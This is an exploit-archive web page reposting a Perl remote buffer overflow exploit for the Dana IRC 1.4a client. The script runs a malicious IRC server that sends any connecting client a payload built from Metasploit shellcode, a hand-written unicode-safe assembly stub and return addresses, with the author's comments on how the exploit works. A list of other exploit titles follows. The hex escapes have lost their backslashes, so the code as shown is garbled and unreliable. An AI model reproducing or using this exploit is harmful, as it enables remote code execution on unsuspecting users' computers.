手机
当前位置:查字典教程网 >网络安全 >Exploit >Dana IRC 1.4a Remote Buffer Overflow Exploit
Dana IRC 1.4a Remote Buffer Overflow Exploit
摘要:#!/usr/bin/perl#k`sOSe-08/24/2008#Thisisauselessandnotportableexploitc...

#!/usr/bin/perl

# k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.

# I was looking for a vuln to write an exploit for when I found this PoC:

#

# http://www.milw0rm.com/exploits/5817

#

# The author wrote:

# "The reason why there isnt any shellcode here is because the client is

# coverting the junk/buffer data to unicode so its corrupting the shellcode,

# ive tried sending unicode buffer but the same problem occurs.

# if anyone else can get further please let me know. but i doubt you can"

#

# It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)

# that i decided to write this. Actually it was pretty funny :)

#

# The first problem is how to redirect the execution flow to our buffer, the buffer can be found

# at three different locations:

# - at some address on the stack converted to unicode

# - at some address on the heap again converted to unicode

# - at some address on the heap in plain ASCII

#

# Unfortunately none of these addresses are unicode friendly :(.

# But.. there is an address on the stack that points in the middle of the buffer(the one on the

# stack), all we need is to pop the stack 6 times and then return.

# To achieve this we return 2 times on a unicode friendly pop,pop,pop,ret.

#

# The second problem is that the buffer on the stack is converted to unicode(so x41 -> x00x41)

# *and* must be, with some exceptions, in the x01 -> x59 space... so I decided to write a

# unicode friendly ASM stub that will load the address of the ASCII version of the buffer in EAX

# using offsets from a register(somewhat related to our buffer), push it and then return.

#

# On my box this works 100 times out of 100 :) use warnings;

use strict;

use IO::Socket; my $sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '16667', Listen => SOMAXCONN, Reuse => 1 ); my $ret = "xa2x41" ; # pop, pop, pop, ret # metasploit shellcode

my $shellcode =

"x50x59x49x49x49x49x49x49x49x49x49x49x51x5a" .

"x56x54x58x33x30x56x58x34x41x50x30x41x33x48" .

"x48x30x41x30x30x41x42x41x41x42x54x41x41x51" .

"x32x41x42x32x42x42x30x42x42x58x50x38x41x43" .

"x4ax4ax49x4bx4cx4bx58x50x44x45x50x45x50x45" .

"x50x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55x44" .

"x38x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4bx51" .

"x4fx47x50x43x31x4ax4bx47x39x4cx4bx50x34x4c" .

"x4bx43x31x4ax4ex46x51x49x50x4cx59x4ex4cx4b" .

"x34x49x50x42x54x44x47x49x51x48x4ax44x4dx43" .

"x31x49x52x4ax4bx4cx34x47x4bx46x34x46x44x44" .

"x44x43x45x4ax45x4cx4bx51x4fx51x34x43x31x4a" .

"x4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4fx45" .

"x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51x4a" .

"x4bx4dx59x51x4cx47x54x44x44x48x43x51x4fx50" .

"x31x4cx36x45x30x50x56x42x44x4cx4bx47x36x46" .

"x50x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4e" .

"x4dx4cx4bx43x58x45x58x4cx49x4cx38x4bx33x49" .

"x50x43x5ax46x30x45x38x4cx30x4dx5ax44x44x51" .

"x4fx42x48x4cx58x4bx4ex4cx4ax44x4ex51x47x4b" .

"x4fx4ax47x47x33x47x4ax51x4cx50x57x50x49x50" .

"x4ex50x44x50x4fx46x37x46x33x51x4cx42x53x42" .

"x59x44x33x44x34x43x55x42x4dx47x43x50x32x51" .

"x4cx43x53x45x31x42x4cx45x33x46x4ex45x35x42" .

"x58x45x35x43x30x45x5ax41x41";

# Black magic unicode friendly ASM stub that will load the shellcode address

# using offsets from a register that points near the shellcode.

my $trampoline = "x52" . # push edx

"x42" .

"x58" . # pop eax

"x42" .

"x55" . # push ebp

"x42" .

"x44" . # inc esp

"x42" .

"x44" . # inc esp

"x42" .

"x59" . # pop ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x41" . # inc ecx

"x42" .

"x51" . # push ecx

"x42" .

"x4c" . # dec esp

"x42" .

"x59" . # pop ecx

"xec" . # add ah,ch

"x42" .

"x50" . # push eax

"x42" .

"x5e" . # pop esi

"x42" .

"x51" . # push ecx

"x42" .

"x44" . # inc esp

"x42" .

"x58" . # pop eax

"x42" .

"x54" . # push esp

"x42" .

"x5b" . # pop ebx

"x42" .

"x56" . # push esi

"x42" .

"x4B" . # dec ebx

"x42" .

"x4B" . # dec ebx

"x42" .

"x4b" . # dec ebx

"x42" .

"x4b" . # dec ebx

"x42" .

"x48" . # dec eax

"x42" .

"x48" . # dec eax

"x42" .

"x48" . # dec eax

"x42" .

"x48" . # dec eax

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x03" . # ADD BYTE PTR DS:[EBX],AL

"x42" .

"x58" . # pop eax

"x42" .

"x44" . # inc esp // realign stack pointer

"x42" .

"x44" . # inc esp // realign stack pointer

"x42" .

"x50" . # push eax

"x42" .

"xc3" ; # ret my $buf2 = $shellcode .

"x41" x (784-length($shellcode)) .

$trampoline .

"x62" x 158 .

$ret .

"x41" x 6 .

$ret; while(my $client = $sock->accept()) {

print $client "$buf2rn";

}

【Dana IRC 1.4a Remote Buffer Overflow Exploit】相关文章:

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

精品推荐
分类导航